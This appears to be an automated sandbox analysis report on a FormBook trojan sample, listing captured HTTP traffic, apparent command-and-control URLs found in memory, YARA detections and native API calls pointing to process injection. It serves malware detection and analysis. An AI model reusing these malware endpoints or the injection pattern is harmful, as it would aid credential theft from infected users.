6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:32 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y6pxFABqXtxJvrONqvuFsVsaSJzrV1xD8nqLaLYsZb4ERPT%2FMkBHOokIu1qdhuw%2Bzm2BEL1LNAqq4TKNX15qK%2BwqlRXyQfByJrVWF6wQPlAZCn8HMtJ062jrSuz0RweJyd2g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81ca8195842d5-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:38 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FfI7mwRydcF%2BegD0Ys4E0V89YYV9R24JEdjTNgx2WcyTQJp6CvewaV0QFmT7fTHFFU7nNwjUSt3bPzDblxo0E4kRdpq1zzzf%2F4qVMEEdfg77mllqm%2F%2B8sxqVbyTpCG1nrDoN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81cc7cf8841e0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:04:40 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj9Zn3o4qcGLdsexIOaF0271SkXyAlEP0kR%2BKyI6FKYLSg5b%2B0v4Nr59MVG6TnnFUG7vcLMfnGy94j2g4owQDW2qN01vKHnGo7zTcxFIfyJcAj92EaK2BGilcMjIDlbfbExz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81cd78da2c329-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: ZkqZZBQxQqm.exe, 00000009.00000002.3264294523.000000000562C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kwytruband.cloud
            Source: ZkqZZBQxQqm.exe, 00000009.00000002.3264294523.000000000562C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kwytruband.cloud/siy1/
            Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: systray.exe, 00000008.00000003.1966731066.000000000824C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
            Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: systray.exe, 00000008.00000002.3260476733.00000000034A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: systray.exe, 00000008.00000002.3263725709.0000000006874000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.3265428680.0000000007FC0000.00000004.00000800.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000004204000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: systray.exe, 00000008.00000002.3263725709.000000000622C000.00000004.10000000.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000003BBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.herplaatsingscoach.com/wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiX
            Source: systray.exe, 00000008.00000002.3263725709.00000000066E2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.3265428680.0000000007FC0000.00000004.00000800.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000004072000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.CMV610942X6UI.exe.2a0c2d0.1.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.CMV610942X6UI.exe.5570000.4.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 0_2_027F2210 NtUnmapViewOfSection,0_2_027F2210
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 0_2_027F2209 NtUnmapViewOfSection,0_2_027F2209
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0042AC23 NtClose,3_2_0042AC23
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2B60 NtClose,LdrInitializeThunk,3_2_00FB2B60
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00FB2C70
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_00FB2DF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB35C0 NtCreateMutant,LdrInitializeThunk,3_2_00FB35C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB4340 NtSetContextThread,3_2_00FB4340
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB4650 NtSuspendThread,3_2_00FB4650
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2AF0 NtWriteFile,3_2_00FB2AF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2AD0 NtReadFile,3_2_00FB2AD0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2AB0 NtWaitForSingleObject,3_2_00FB2AB0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2BF0 NtAllocateVirtualMemory,3_2_00FB2BF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2BE0 NtQueryValueKey,3_2_00FB2BE0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2BA0 NtEnumerateValueKey,3_2_00FB2BA0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2B80 NtQueryInformationFile,3_2_00FB2B80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2CF0 NtOpenProcess,3_2_00FB2CF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2CC0 NtQueryVirtualMemory,3_2_00FB2CC0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2CA0 NtQueryInformationToken,3_2_00FB2CA0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2C60 NtCreateKey,3_2_00FB2C60
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2C00 NtQueryInformationProcess,3_2_00FB2C00
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2DD0 NtDelayExecution,3_2_00FB2DD0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2DB0 NtEnumerateKey,3_2_00FB2DB0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2D30 NtUnmapViewOfSection,3_2_00FB2D30
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2D10 NtMapViewOfSection,3_2_00FB2D10
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2D00 NtSetInformationFile,3_2_00FB2D00
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2EE0 NtQueueApcThread,3_2_00FB2EE0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2EA0 NtAdjustPrivilegesToken,3_2_00FB2EA0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2E80 NtReadVirtualMemory,3_2_00FB2E80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2E30 NtWriteVirtualMemory,3_2_00FB2E30
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2FE0 NtCreateFile,3_2_00FB2FE0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2FB0 NtResumeThread,3_2_00FB2FB0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2FA0 NtQuerySection,3_2_00FB2FA0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2F90 NtProtectVirtualMemory,3_2_00FB2F90
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2F60 NtCreateProcessEx,3_2_00FB2F60
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2F30 NtCreateSection,3_2_00FB2F30
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB3090 NtSetValueKey,3_2_00FB3090
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB3010 NtOpenDirectoryObject,3_2_00FB3010
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB39B0 NtGetContextThread,3_2_00FB39B0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB3D70 NtOpenThread,3_2_00FB3D70
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB3D10 NtOpenProcessToken,3_2_00FB3D10
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05244650 NtSuspendThread,LdrInitializeThunk,8_2_05244650
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05244340 NtSetContextThread,LdrInitializeThunk,8_2_05244340
